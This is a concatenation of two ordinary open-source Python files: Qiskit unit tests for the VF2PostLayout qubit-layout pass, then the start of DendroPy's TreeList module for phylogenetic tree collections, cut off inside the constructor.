    def assertLayout(self, dag, coupling_map, property_set):
        """Checks that the pass found a solution and that every two-qubit gate
        in ``dag`` is mapped onto an edge of ``coupling_map`` by the layout in
        ``property_set["post_layout"]``."""
        self.assertEqual(
            property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.SOLUTION_FOUND
        )
        layout = property_set["post_layout"]
        for gate in dag.two_qubit_ops():
            # Gates with custom calibrations are skipped: they are not
            # checked against the coupling map.
            if dag.has_calibration_for(gate):
                continue
            physical_q0 = layout[gate.qargs[0]]
            physical_q1 = layout[gate.qargs[1]]
            self.assertTrue(coupling_map.graph.has_edge(physical_q0, physical_q1))
    def assertLayoutV2(self, dag, target, property_set):
        """Checks that the pass found a solution and that every two-qubit gate
        in ``dag`` is supported by ``target`` on the qubit pair assigned by the
        layout in ``property_set["post_layout"]``."""
        self.assertEqual(
            property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.SOLUTION_FOUND
        )
        layout = property_set["post_layout"]
        for gate in dag.two_qubit_ops():
            # Gates with custom calibrations are skipped: they are not
            # checked against the target's supported instructions.
            if dag.has_calibration_for(gate):
                continue
            physical_q0 = layout[gate.qargs[0]]
            physical_q1 = layout[gate.qargs[1]]
            qargs = (physical_q0, physical_q1)
            self.assertTrue(target.instruction_supported(gate.name, qargs))
    def test_no_constraints(self):
        """Test we raise at runtime if no target or coupling graph specified."""
        qc = QuantumCircuit(2)
        empty_pass = VF2PostLayout()
        with self.assertRaises(TranspilerError):
            empty_pass.run(circuit_to_dag(qc))
    def test_no_backend_properties(self):
        """Test we raise at runtime if no properties are provided with a coupling graph."""
        qc = QuantumCircuit(2)
        empty_pass = VF2PostLayout(coupling_map=CouplingMap([(0, 1), (1, 2)]))
        with self.assertRaises(TranspilerError):
            empty_pass.run(circuit_to_dag(qc))
    def test_empty_circuit(self):
        """Test no solution found for empty circuit"""
        qc = QuantumCircuit(2, 2)
        backend = FakeLima()
        cmap = CouplingMap(backend.configuration().coupling_map)
        props = backend.properties()
        vf2_pass = VF2PostLayout(coupling_map=cmap, properties=props)
        vf2_pass.run(circuit_to_dag(qc))
        self.assertEqual(
            vf2_pass.property_set["VF2PostLayout_stop_reason"],
            VF2PostLayoutStopReason.NO_SOLUTION_FOUND,
        )
    def test_empty_circuit_v2(self):
        """Test no solution found for empty circuit with v2 backend"""
        qc = QuantumCircuit(2, 2)
        backend = FakeLimaV2()
        vf2_pass = VF2PostLayout(target=backend.target)
        vf2_pass.run(circuit_to_dag(qc))
        self.assertEqual(
            vf2_pass.property_set["VF2PostLayout_stop_reason"],
            VF2PostLayoutStopReason.NO_SOLUTION_FOUND,
        )
    def test_skip_3q_circuit(self):
        """Test that the pass is a no-op on circuits with >2q gates."""
        qc = QuantumCircuit(3)
        qc.ccx(0, 1, 2)
        backend = FakeLima()
        cmap = CouplingMap(backend.configuration().coupling_map)
        props = backend.properties()
        vf2_pass = VF2PostLayout(coupling_map=cmap, properties=props)
        vf2_pass.run(circuit_to_dag(qc))
        self.assertEqual(
            vf2_pass.property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.MORE_THAN_2Q
        )
    def test_skip_3q_circuit_v2(self):
        """Test that the pass is a no-op on circuits with >2q gates with a target."""
        qc = QuantumCircuit(3)
        qc.ccx(0, 1, 2)
        backend = FakeLimaV2()
        vf2_pass = VF2PostLayout(target=backend.target)
        vf2_pass.run(circuit_to_dag(qc))
        self.assertEqual(
            vf2_pass.property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.MORE_THAN_2Q
        )
    def test_best_mapping_ghz_state_full_device_multiple_qregs(self):
        """Test best mappings with multiple registers"""
        backend = FakeLima()
        qr_a = QuantumRegister(2)
        qr_b = QuantumRegister(3)
        qc = QuantumCircuit(qr_a, qr_b)
        qc.h(qr_a[0])
        qc.cx(qr_a[0], qr_a[1])
        qc.cx(qr_a[0], qr_b[0])
        qc.cx(qr_a[0], qr_b[1])
        qc.cx(qr_a[0], qr_b[2])
        qc.measure_all()
        # Trivial layout is deliberately suboptimal so the post-layout pass
        # has room to find a better mapping than the initial one.
        tqc = transpile(qc, backend, seed_transpiler=self.seed, layout_method="trivial")
        initial_layout = tqc._layout
        dag = circuit_to_dag(tqc)
        cmap = CouplingMap(backend.configuration().coupling_map)
        props = backend.properties()
        pass_ = VF2PostLayout(coupling_map=cmap, properties=props, seed=self.seed)
        pass_.run(dag)
        self.assertLayout(dag, cmap, pass_.property_set)
        self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
    def test_2q_circuit_5q_backend(self):
        """A simple example, without considering the direction
        0 - 1
        qr1 - qr0
        """
        backend = FakeYorktown()
        qr = QuantumRegister(2, "qr")
        circuit = QuantumCircuit(qr)
        circuit.cx(qr[1], qr[0])  # qr1 -> qr0
        tqc = transpile(circuit, backend, layout_method="dense")
        initial_layout = tqc._layout
        dag = circuit_to_dag(tqc)
        cmap = CouplingMap(backend.configuration().coupling_map)
        props = backend.properties()
        pass_ = VF2PostLayout(coupling_map=cmap, properties=props, seed=self.seed)
        pass_.run(dag)
        self.assertLayout(dag, cmap, pass_.property_set)
        self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
    def test_best_mapping_ghz_state_full_device_multiple_qregs_v2(self):
        """Test best mappings with multiple registers"""
        backend = FakeLimaV2()
        qr_a = QuantumRegister(2)
        qr_b = QuantumRegister(3)
        qc = QuantumCircuit(qr_a, qr_b)
        qc.h(qr_a[0])
        qc.cx(qr_a[0], qr_a[1])
        qc.cx(qr_a[0], qr_b[0])
        qc.cx(qr_a[0], qr_b[1])
        qc.cx(qr_a[0], qr_b[2])
        qc.measure_all()
        tqc = transpile(qc, backend, seed_transpiler=self.seed, layout_method="trivial")
        initial_layout = tqc._layout
        dag = circuit_to_dag(tqc)
        pass_ = VF2PostLayout(target=backend.target, seed=self.seed)
        pass_.run(dag)
        self.assertLayoutV2(dag, backend.target, pass_.property_set)
        self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
    def test_2q_circuit_5q_backend_v2(self):
        """A simple example, without considering the direction
        0 - 1
        qr1 - qr0
        """
        backend = FakeYorktownV2()
        qr = QuantumRegister(2, "qr")
        circuit = QuantumCircuit(qr)
        circuit.cx(qr[1], qr[0])  # qr1 -> qr0
        tqc = transpile(circuit, backend, layout_method="dense")
        initial_layout = tqc._layout
        dag = circuit_to_dag(tqc)
        pass_ = VF2PostLayout(target=backend.target, seed=self.seed)
        pass_.run(dag)
        self.assertLayoutV2(dag, backend.target, pass_.property_set)
        self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
    def test_target_invalid_2q_gate(self):
        """Test that we don't find a solution with a gate outside target."""
        backend = FakeYorktownV2()
        qc = QuantumCircuit(2)
        # ``ecr`` is not in the FakeYorktownV2 target, so no layout can make
        # this circuit valid.
        qc.ecr(0, 1)
        dag = circuit_to_dag(qc)
        pass_ = VF2PostLayout(target=backend.target, seed=self.seed)
        pass_.run(dag)
        self.assertEqual(
            pass_.property_set["VF2PostLayout_stop_reason"],
            VF2PostLayoutStopReason.NO_SOLUTION_FOUND,
        )
class TestVF2PostLayoutScoring(QiskitTestCase):
    """Exercises the layout-scoring heuristics used by VF2PostLayout."""
    def test_empty_score(self):
        """An empty interaction graph must score an error rate of 0."""
        backend = FakeYorktownV2()
        scoring_pass = VF2PostLayout(target=backend.target)
        qubit_indices = {}
        index_to_qubit = {}
        interaction_graph = retworkx.PyDiGraph()
        empty_layout = Layout()
        score = scoring_pass._score_layout(
            empty_layout, qubit_indices, index_to_qubit, interaction_graph
        )
        self.assertEqual(0, score)
    def test_all_1q_score(self):
        """Score a two-qubit interaction graph containing only 1q (sx) gates."""
        backend = FakeYorktownV2()
        scoring_pass = VF2PostLayout(target=backend.target)
        qubit_indices = {Qubit(): 0, Qubit(): 1}
        index_to_qubit = {index: qubit for qubit, index in qubit_indices.items()}
        interaction_graph = retworkx.PyDiGraph()
        # One node per virtual qubit, each recording a single "sx" gate.
        interaction_graph.add_node({"sx": 1})
        interaction_graph.add_node({"sx": 1})
        trial_layout = Layout(qubit_indices)
        score = scoring_pass._score_layout(
            trial_layout, qubit_indices, index_to_qubit, interaction_graph
        )
        self.assertAlmostEqual(0.002925, score, places=5)
    def test_all_1q_avg_score(self):
        """Score the same sx-only graph via the average-error-map heuristic."""
        backend = FakeYorktownV2()
        scoring_pass = VF2PostLayout(target=backend.target)
        qubit_indices = {Qubit(): 0, Qubit(): 1}
        index_to_qubit = {index: qubit for qubit, index in qubit_indices.items()}
        interaction_graph = retworkx.PyDiGraph()
        interaction_graph.add_node({"sx": 1})
        interaction_graph.add_node({"sx": 1})
        scoring_pass.avg_error_map = vf2_utils.build_average_error_map(
            scoring_pass.target, scoring_pass.properties, scoring_pass.coupling_map
        )
        trial_layout = Layout(qubit_indices)
        score = vf2_utils.score_layout(
            scoring_pass.avg_error_map, trial_layout, qubit_indices, index_to_qubit, interaction_graph
        )
        self.assertAlmostEqual(0.02054, score, places=5)
class TestVF2PostLayoutUndirected(QiskitTestCase):
    """Tests the VF2PostLayout pass with ``strict_direction=False`` (undirected)."""
    # Fixed seed so transpilation and the pass's internal randomization are
    # deterministic across runs.
    seed = 42
    def assertLayout(self, dag, coupling_map, property_set):
        """Checks that the pass found a solution and that every two-qubit gate
        in ``dag`` is mapped onto an edge of ``coupling_map`` by the layout in
        ``property_set["post_layout"]``."""
        self.assertEqual(
            property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.SOLUTION_FOUND
        )
        layout = property_set["post_layout"]
        for gate in dag.two_qubit_ops():
            # Gates with custom calibrations are skipped: they are not
            # checked against the coupling map.
            if dag.has_calibration_for(gate):
                continue
            physical_q0 = layout[gate.qargs[0]]
            physical_q1 = layout[gate.qargs[1]]
            self.assertTrue(coupling_map.graph.has_edge(physical_q0, physical_q1))
    def assertLayoutV2(self, dag, target, property_set):
        """Checks that the pass found a solution and that every two-qubit gate
        in ``dag`` is supported by ``target`` on the qubit pair assigned by the
        layout in ``property_set["post_layout"]``."""
        self.assertEqual(
            property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.SOLUTION_FOUND
        )
        layout = property_set["post_layout"]
        for gate in dag.two_qubit_ops():
            # Gates with custom calibrations are skipped: they are not
            # checked against the target's supported instructions.
            if dag.has_calibration_for(gate):
                continue
            physical_q0 = layout[gate.qargs[0]]
            physical_q1 = layout[gate.qargs[1]]
            qargs = (physical_q0, physical_q1)
            self.assertTrue(target.instruction_supported(gate.name, qargs))
    def test_no_constraints(self):
        """Test we raise at runtime if no target or coupling graph specified."""
        qc = QuantumCircuit(2)
        empty_pass = VF2PostLayout(strict_direction=False)
        with self.assertRaises(TranspilerError):
            empty_pass.run(circuit_to_dag(qc))
    def test_no_backend_properties(self):
        """Test we raise at runtime if no properties are provided with a coupling graph."""
        qc = QuantumCircuit(2)
        empty_pass = VF2PostLayout(
            coupling_map=CouplingMap([(0, 1), (1, 2)]), strict_direction=False
        )
        with self.assertRaises(TranspilerError):
            empty_pass.run(circuit_to_dag(qc))
    def test_empty_circuit(self):
        """Test no solution found for empty circuit"""
        qc = QuantumCircuit(2, 2)
        backend = FakeLima()
        cmap = CouplingMap(backend.configuration().coupling_map)
        props = backend.properties()
        vf2_pass = VF2PostLayout(coupling_map=cmap, properties=props, strict_direction=False)
        vf2_pass.run(circuit_to_dag(qc))
        self.assertEqual(
            vf2_pass.property_set["VF2PostLayout_stop_reason"],
            VF2PostLayoutStopReason.NO_SOLUTION_FOUND,
        )
    def test_empty_circuit_v2(self):
        """Test no solution found for empty circuit with v2 backend"""
        qc = QuantumCircuit(2, 2)
        backend = FakeLimaV2()
        vf2_pass = VF2PostLayout(target=backend.target, strict_direction=False)
        vf2_pass.run(circuit_to_dag(qc))
        self.assertEqual(
            vf2_pass.property_set["VF2PostLayout_stop_reason"],
            VF2PostLayoutStopReason.NO_SOLUTION_FOUND,
        )
    def test_skip_3q_circuit(self):
        """Test that the pass is a no-op on circuits with >2q gates."""
        qc = QuantumCircuit(3)
        qc.ccx(0, 1, 2)
        backend = FakeLima()
        cmap = CouplingMap(backend.configuration().coupling_map)
        props = backend.properties()
        vf2_pass = VF2PostLayout(coupling_map=cmap, properties=props, strict_direction=False)
        vf2_pass.run(circuit_to_dag(qc))
        self.assertEqual(
            vf2_pass.property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.MORE_THAN_2Q
        )
    def test_skip_3q_circuit_v2(self):
        """Test that the pass is a no-op on circuits with >2q gates with a target."""
        qc = QuantumCircuit(3)
        qc.ccx(0, 1, 2)
        backend = FakeLimaV2()
        vf2_pass = VF2PostLayout(target=backend.target, strict_direction=False)
        vf2_pass.run(circuit_to_dag(qc))
        self.assertEqual(
            vf2_pass.property_set["VF2PostLayout_stop_reason"], VF2PostLayoutStopReason.MORE_THAN_2Q
        )
    def test_best_mapping_ghz_state_full_device_multiple_qregs(self):
        """Test best mappings with multiple registers"""
        backend = FakeLima()
        qr_a = QuantumRegister(2)
        qr_b = QuantumRegister(3)
        qc = QuantumCircuit(qr_a, qr_b)
        qc.h(qr_a[0])
        qc.cx(qr_a[0], qr_a[1])
        qc.cx(qr_a[0], qr_b[0])
        qc.cx(qr_a[0], qr_b[1])
        qc.cx(qr_a[0], qr_b[2])
        qc.measure_all()
        # Trivial layout is deliberately suboptimal so the post-layout pass
        # has room to find a better mapping than the initial one.
        tqc = transpile(qc, backend, seed_transpiler=self.seed, layout_method="trivial")
        initial_layout = tqc._layout
        dag = circuit_to_dag(tqc)
        cmap = CouplingMap(backend.configuration().coupling_map)
        props = backend.properties()
        pass_ = VF2PostLayout(
            coupling_map=cmap, properties=props, seed=self.seed, strict_direction=False
        )
        pass_.run(dag)
        self.assertLayout(dag, cmap, pass_.property_set)
        self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
    def test_2q_circuit_5q_backend(self):
        """A simple example, without considering the direction
        0 - 1
        qr1 - qr0
        """
        backend = FakeYorktown()
        qr = QuantumRegister(2, "qr")
        circuit = QuantumCircuit(qr)
        circuit.cx(qr[1], qr[0])  # qr1 -> qr0
        tqc = transpile(circuit, backend, layout_method="dense")
        initial_layout = tqc._layout
        dag = circuit_to_dag(tqc)
        cmap = CouplingMap(backend.configuration().coupling_map)
        props = backend.properties()
        pass_ = VF2PostLayout(
            coupling_map=cmap, properties=props, seed=self.seed, strict_direction=False
        )
        pass_.run(dag)
        self.assertLayout(dag, cmap, pass_.property_set)
        self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
    def test_best_mapping_ghz_state_full_device_multiple_qregs_v2(self):
        """Test best mappings with multiple registers"""
        backend = FakeLimaV2()
        qr_a = QuantumRegister(2)
        qr_b = QuantumRegister(3)
        qc = QuantumCircuit(qr_a, qr_b)
        qc.h(qr_a[0])
        qc.cx(qr_a[0], qr_a[1])
        qc.cx(qr_a[0], qr_b[0])
        qc.cx(qr_a[0], qr_b[1])
        qc.cx(qr_a[0], qr_b[2])
        qc.measure_all()
        tqc = transpile(qc, backend, seed_transpiler=self.seed, layout_method="trivial")
        initial_layout = tqc._layout
        dag = circuit_to_dag(tqc)
        pass_ = VF2PostLayout(target=backend.target, seed=self.seed, strict_direction=False)
        pass_.run(dag)
        self.assertLayoutV2(dag, backend.target, pass_.property_set)
        self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
    def test_2q_circuit_5q_backend_v2(self):
        """A simple example, without considering the direction
        0 - 1
        qr1 - qr0
        """
        backend = FakeYorktownV2()
        qr = QuantumRegister(2, "qr")
        circuit = QuantumCircuit(qr)
        circuit.cx(qr[1], qr[0])  # qr1 -> qr0
        tqc = transpile(circuit, backend, layout_method="dense")
        initial_layout = tqc._layout
        dag = circuit_to_dag(tqc)
        pass_ = VF2PostLayout(target=backend.target, seed=self.seed, strict_direction=False)
        pass_.run(dag)
        self.assertLayoutV2(dag, backend.target, pass_.property_set)
        self.assertNotEqual(pass_.property_set["post_layout"], initial_layout)
| StarcoderdataPython |
6629148 | #! /usr/bin/env python
##############################################################################
## DendroPy Phylogenetic Computing Library.
##
## Copyright 2010-2015 <NAME> and <NAME>.
## All rights reserved.
##
## See "LICENSE.rst" for terms and conditions of usage.
##
## If you use this work or any portion thereof in published work,
## please cite it as:
##
## <NAME>. and <NAME>. 2010. DendroPy: a Python library
## for phylogenetic computing. Bioinformatics 26: 1569-1571.
##
##############################################################################
"""
This module handles the core definition of classes that model collections of
trees.
"""
import collections
import math
import copy
import sys
from dendropy.utility import container
from dendropy.utility import error
from dendropy.utility import bitprocessing
from dendropy.utility import deprecate
from dendropy.utility import constants
from dendropy.calculate import statistics
from dendropy.datamodel import basemodel
from dendropy.datamodel import taxonmodel
from dendropy.datamodel import treemodel
from dendropy import dataio
##############################################################################
### TreeList
class TreeList(
taxonmodel.TaxonNamespaceAssociated,
basemodel.Annotable,
basemodel.Deserializable,
basemodel.MultiReadable,
basemodel.Serializable,
basemodel.DataObject):
"""
A collection of |Tree| objects, all referencing the same "universe" of
    operational taxonomic unit concepts through the same |TaxonNamespace|
object reference.
"""
    def _parse_and_create_from_stream(cls,
            stream,
            schema,
            collection_offset=None,
            tree_offset=None,
            **kwargs):
        """
        Constructs a new |TreeList| object and populates it with trees from
        file-like object ``stream``.

        Notes
        -----
        *All* operational taxonomic unit concepts in the data source will be included
        in the |TaxonNamespace| object associated with the new
        |TreeList| object and its contained |Tree| objects, even those
        not associated with trees or the particular trees being retrieved.

        Parameters
        ----------
        stream : file or file-like object
            Source of data.
        schema : string
            Identifier of format of data in ``stream``
        collection_offset : integer or None
            0-based index indicating collection of trees to parse. If |None|,
            then all tree collections are retrieved, with each distinct
            collection parsed into a separate |TreeList| object. If the
            tree collection offset index is equal or greater than the number of
            tree collections in the data source, then IndexError is raised.
            Negative offsets work like negative list indexes; e.g., a
            ``collection_offset`` of -1 means to read the last collection of
            trees in the data source. Data formats that do not support the
            concept of distinct tree collections (e.g. NEWICK) are considered
            single-collection data sources (i.e., the only acceptable
            ``collection_offset`` values are -1 or 0).
        tree_offset : integer or None
            0-based index indicating particular tree within a particular
            collection of trees at which to begin reading. If not specified or
            |None| (default), then all trees are parsed. Otherwise, must be an
            integer value up the length of the collection minus 1. A positive
            offset indicates the number of trees in the collection to skip;
            e.g. a ``tree_offset`` of 20 means to skip the first 20 trees in the
            collection. Negative offsets work like negative list indexes;
            e.g., a ``tree_offset`` value of -10 means to retrieve the last 10
            trees in the collection. If the tree offset index is equal or
            greater than the number of trees in the collection, then IndexError
            is raised. Requires that a particular tree collection has been
            identified using the ``tree_collection_offset`` parameter: if
            ``tree_collection_offset`` is not specified, a TypeError is raised.
        \*\*kwargs : keyword arguments
            Arguments to customize parsing, instantiation, processing, and
            accession of |Tree| objects read from the data source, including
            schema- or format-specific handling.

            The following optional keyword arguments are recognized and handled
            by this function:

                * ``label`` Specifies the label or description of the new
                  |TreeList|.
                * ``taxon_namespace`` specifies the |TaxonNamespace|
                   object to be attached to the new |TreeList| object.
                   Note that *all* operational taxonomic unit concepts in the
                   data source will be accessioned into the specified
                   |TaxonNamespace| instance. This includes the
                   operation taxonomic unit definitions associated with all
                   tree collections and character matrices in the data source.
                * ``tree_list`` : **SPECIAL** If passed a |TreeList| using
                  this keyword, then this instance is populated and returned
                  (instead of a new instance being created).

            All other keyword arguments are passed directly to |TreeList|.read()`.
            Other keyword arguments may be available, depending on the implementation
            of the reader specialized to handle ``schema`` formats.

        Notes
        -----
        Note that in most cases, even if ``collection_offset`` and ``tree_offset``
        are specified to restrict the trees returned, the *entire* data source
        is still parsed and processed. So this is not more efficient than
        reading all the trees and then manually-extracting them later; just
        more convenient. If you need just a single subset of trees from a data
        source, there is no gain in efficiency. If you need multiple trees or
        subsets of trees from the same data source, it would be much more
        efficient to read the entire data source, and extract trees as needed.

        Returns
        -------
        A |TreeList| object.

        """
        # these must be pulled before passing the kwargs
        # down to the reader
        tree_list = kwargs.pop("tree_list", None)
        taxon_namespace = taxonmodel.process_kwargs_dict_for_taxon_namespace(kwargs, None)
        label = kwargs.pop("label", None)
        # get the reader
        reader = dataio.get_reader(schema, **kwargs)
        # Accommodate an existing TreeList object being passed
        if tree_list is None:
            tree_list = cls(label=label, taxon_namespace=taxon_namespace)
        # A bare ``tree_offset`` implies the first (and possibly only)
        # collection in the source.
        if collection_offset is None and tree_offset is not None:
            collection_offset = 0
        if collection_offset is None:
            # if tree_offset is not None:
            #     raise TypeError("Cannot specify ``tree_offset`` without specifying ``collection_offset``")
            # coerce all tree products into this list: the pseudofactories
            # redirect every namespace/list the reader requests to
            # ``tree_list`` itself.
            reader.read_tree_lists(
                        stream=stream,
                        taxon_namespace_factory=tree_list._taxon_namespace_pseudofactory,
                        tree_list_factory=tree_list._tree_list_pseudofactory,
                        global_annotations_target=None)
        else:
            # Parse every collection into its own TreeList, then copy the
            # requested (sub)collection into ``tree_list``.
            tree_lists = reader.read_tree_lists(
                        stream=stream,
                        taxon_namespace_factory=tree_list._taxon_namespace_pseudofactory,
                        tree_list_factory=tree_list.__class__,
                        global_annotations_target=None)
            # if collection_offset < 0:
            #     raise IndexError("Collection offset out of range: {} (minimum valid tree offset = 0)".format(collection_offset))
            if collection_offset >= len(tree_lists):
                raise IndexError("Collection offset out of range: {} (number of collections = {}, maximum valid collection offset = {})".format(collection_offset, len(tree_lists), len(tree_lists)-1))
            target_tree_list = tree_lists[collection_offset]
            tree_list.copy_annotations_from(target_tree_list)
            if tree_offset is not None:
                # if tree_offset < 0:
                #     raise IndexError("Tree offset out of range: {} (minimum offset = 0)".format(tree_offset))
                if tree_offset >= len(target_tree_list):
                    raise IndexError("Tree offset out of range: {} (number of trees in source = {}, maximum valid tree offset = {})".format(tree_offset, len(target_tree_list), len(target_tree_list)-1))
                for tree in target_tree_list[tree_offset:]:
                    tree_list._trees.append(tree)
            else:
                for tree in target_tree_list:
                    tree_list._trees.append(tree)
        return tree_list
        # taxon_namespace = taxonmodel.process_kwargs_dict_for_taxon_namespace(kwargs, None)
        # label = kwargs.pop("label", None)
        # tree_list = cls(label=label,
        #         taxon_namespace=taxon_namespace)
        # tree_list.read(
        #         stream=stream,
        #         schema=schema,
        #         collection_offset=collection_offset,
        #         tree_offset=tree_offset,
        #         **kwargs)
        # return tree_list
    # Exposed as a classmethod via assignment (legacy style, kept as-is).
    _parse_and_create_from_stream = classmethod(_parse_and_create_from_stream)
    @classmethod
    def get(cls, **kwargs):
        """
        Instantiate and return a *new* |TreeList| object from a data source.

        **Mandatory Source-Specification Keyword Argument (Exactly One Required):**

            - **file** (*file*) -- File or file-like object of data opened for reading.
            - **path** (*str*) -- Path to file of data.
            - **url** (*str*) -- URL of data.
            - **data** (*str*) -- Data given directly.

        **Mandatory Schema-Specification Keyword Argument:**

            - **schema** (*str*) -- Identifier of format of data given by the
              "``file``", "``path``", "``data``", or "``url``" argument
              specified above: ":doc:`newick </schemas/newick>`", ":doc:`nexus
              </schemas/nexus>`", or ":doc:`nexml </schemas/nexml>`". See
              "|Schemas|" for more details.

        **Optional General Keyword Arguments:**

            - **label** (*str*) -- Name or identifier to be assigned to the new
              object; if not given, will be assigned the one specified in the
              data source, or |None| otherwise.
            - **taxon_namespace** (|TaxonNamespace|) -- The |TaxonNamespace|
              instance to use to :doc:`manage the taxon names </primer/taxa>`.
              If not specified, a new one will be created.
            - **collection_offset** (*int*) -- 0-based index of tree block or
              collection in source to be parsed. If not specified then the
              first collection (offset = 0) is assumed.
            - **tree_offset** (*int*) -- 0-based index of first tree within the
              collection specified by ``collection_offset`` to be parsed (i.e.,
              skipping the first ``tree_offset`` trees). If not
              specified, then the first tree (offset = 0) is assumed (i.e., no
              trees within the specified collection will be skipped). Use this
              to specify, e.g. a burn-in.
            - **ignore_unrecognized_keyword_arguments** (*bool*) -- If |True|,
              then unsupported or unrecognized keyword arguments will not
              result in an error. Default is |False|: unsupported keyword
              arguments will result in an error.

        **Optional Schema-Specific Keyword Arguments:**

            These provide control over how the data is interpreted and
            processed, and supported argument names and values depend on
            the schema as specified by the value passed as the "``schema``"
            argument. See "|Schemas|" for more details.

        **Examples:**

        ::

            tlst1 = dendropy.TreeList.get(
                    file=open('treefile.tre', 'rU'),
                    schema="newick")
            tlst2 = dendropy.TreeList.get(
                    path='sometrees.nexus',
                    schema="nexus",
                    collection_offset=2,
                    tree_offset=100)
            tlst3 = dendropy.TreeList.get(
                    data="((A,B),(C,D));((A,C),(B,D));",
                    schema="newick")
            tree4 = dendropy.dendropy.TreeList.get(
                    url="http://api.opentreeoflife.org/v2/study/pg_1144/tree/tree2324.nex",
                    schema="nexus")

        """
        # Delegates to the inherited ``_get_from`` helper (from the
        # Deserializable base), which dispatches on the file/path/url/data
        # source keyword and ultimately calls _parse_and_create_from_stream.
        return cls._get_from(**kwargs)
    # Class of tree object instantiated by ``tree_factory`` when no
    # per-instance ``tree_type`` override has been set.
    DEFAULT_TREE_TYPE = treemodel.Tree
    def tree_factory(cls, *args, **kwargs):
        """
        Creates and returns a |Tree| of a type that this list understands how to
        manage.

        Deriving classes can override this to provide for custom Tree-type
        object lists. You can simply override the class-level variable
        `DEFAULT_TREE_TYPE` in your derived class if the constructor signature
        of the alternate tree type is the same as |Tree|.

        If you want to have a TreeList *instance* that generates
        custom trees (i.e., as opposed to a TreeList-ish *class* of instances),
        set the ``tree_type`` attribute of the TreeList instance.

        Parameters
        ----------
        \*args : positional arguments
            Passed directly to constructor of |Tree|.
        \*\*kwargs : keyword arguments
            Passed directly to constructor of |Tree|.

        Returns
        -------
        A |Tree| object.

        """
        tree = cls.DEFAULT_TREE_TYPE(*args, **kwargs)
        return tree
    # Exposed as a classmethod via assignment (legacy style, kept as-is).
    tree_factory = classmethod(tree_factory)
###########################################################################
### Lifecycle and Identity
    def __init__(self, *args, **kwargs):
        """
        Constructs a new |TreeList| object, populating it with any iterable
        container with Tree object members passed as unnamed argument, or from
        a data source if ``stream`` and ``schema`` are passed.

        If passed an iterable container, the objects in that container must be
        of type |Tree| (or derived). If the container is of type |TreeList|,
        then, because each |Tree| object must have the same |TaxonNamespace|
        reference as the containing |TreeList|, the trees in the container
        passed as an initialization argument will be **deep**-copied (except
        for associated |TaxonNamespace| and |Taxon| objects, which will
        be shallow-copied). If the container is any other type of
        iterable, then the |Tree| objects will be **shallow**-copied.

        |TreeList| objects can directly thus be instantiated in the
        following ways::

            # /usr/bin/env python

            from dendropy import TaxonNamespace, Tree, TreeList

            # instantiate an empty tree list
            tlst1 = TreeList()

            # TreeList objects can be instantiated from an external data source
            # using the 'get()' factory class method
            tlst2 = TreeList.get(file=open('treefile.tre', 'rU'), schema="newick")
            tlst3 = TreeList.get(path='sometrees.nexus', schema="nexus")
            tlst4 = TreeList.get(data="((A,B),(C,D));((A,C),(B,D));", schema="newick")

            # can also call `read()` on a TreeList object; each read adds
            # (appends) the tree(s) found to the TreeList
            tlst5 = TreeList()
            tlst5.read(file=open('boot1.tre', 'rU'), schema="newick")
            tlst5.read(path="boot3.tre", schema="newick")
            tlst5.read(value="((A,B),(C,D));((A,C),(B,D));", schema="newick")

            # populated from list of Tree objects
            tlist6_1 = Tree.get(
                    data="((A,B),(C,D))",
                    schema="newick")
            tlist6_2 = Tree.get(
                    data="((A,C),(B,D))",
                    schema="newick")
            tlist6 = TreeList([tlist6_1, tlist6_2])

            # passing keywords to underlying tree parser
            tlst8 = TreeList.get(
                     data="((A,B),(C,D));((A,C),(B,D));",
                     schema="newick",
                     taxon_namespace=tlst3.taxon_namespace,
                     rooting="force-rooted",
                     extract_comment_metadata=True,
                     store_tree_weights=False,
                     preserve_underscores=True)

            # Subsets of trees can be read. Note that in most cases, the entire
            # data source is parsed, so this is not more efficient than reading
            # all the trees and then manually-extracting them later; just more
            # convenient

            # skip the *first* 100 trees in the *first* (offset=0) collection of trees
            trees = TreeList.get(
                        path="mcmc.tre",
                        schema="newick",
                        collection_offset=0,
                        tree_offset=100)

            # get the *last* 10 trees in the *second* (offset=1) collection of trees
            trees = TreeList.get(
                        path="mcmc.tre",
                        schema="newick",
                        collection_offset=1,
                        tree_offset=-10)

            # get the last 10 trees in the second-to-last collection of trees
            trees = TreeList.get(
                        path="mcmc.tre",
                        schema="newick",
                        collection_offset=-2,
                        tree_offset=100)

            # Slices give shallow-copy: trees are references
            tlst4copy0a = tlst4[:]
            assert tlst4copy0a[0] is tlst4[0]
            tlst4copy0b = tlst4[:4]
            assert tlst4copy0b[0] is tlst4[0]

            # 'Taxon-namespace-scoped' copy:
            # I.e., Deep-copied objects but taxa and taxon namespace
            # are copied as references
            tlst4copy1a = TreeList(tlst4)
            tlst4copy1b = TreeList([Tree(t) for t in tlst4])
            assert tlst4copy1a[0] is not tlst4[0] # True
            assert tlst4copy1a.taxon_namespace is tlst4.taxon_namespace # True
            assert tlst4copy1b[0] is not tlst4[0] # True
            assert tlst4copy1b.taxon_namespace is tlst4.taxon_namespace # True

        """
        if len(args) > 1:
            # only allow 1 positional argument
            raise error.TooManyArgumentsError(func_name=self.__class__.__name__, max_args=1, args=args)
        elif len(args) == 1 and isinstance(args[0], TreeList):
            # Copy-construction from another TreeList: delegate to
            # _clone_from, which deep-copies trees but (by default) shares
            # the taxon namespace and taxa.
            self._clone_from(args[0], kwargs)
        else:
            basemodel.DataObject.__init__(self, label=kwargs.pop("label", None))
            taxonmodel.TaxonNamespaceAssociated.__init__(self,
                    taxon_namespace=taxonmodel.process_kwargs_dict_for_taxon_namespace(kwargs, None))
            # Type used to validate members and by tree_factory().
            self.tree_type = kwargs.pop("tree_type", self.__class__.DEFAULT_TREE_TYPE)
            self._trees = []
            self.comments = []
            if len(args) == 1:
                # Non-TreeList iterable: members are appended by reference
                # (shallow copy) after type-checking each one.
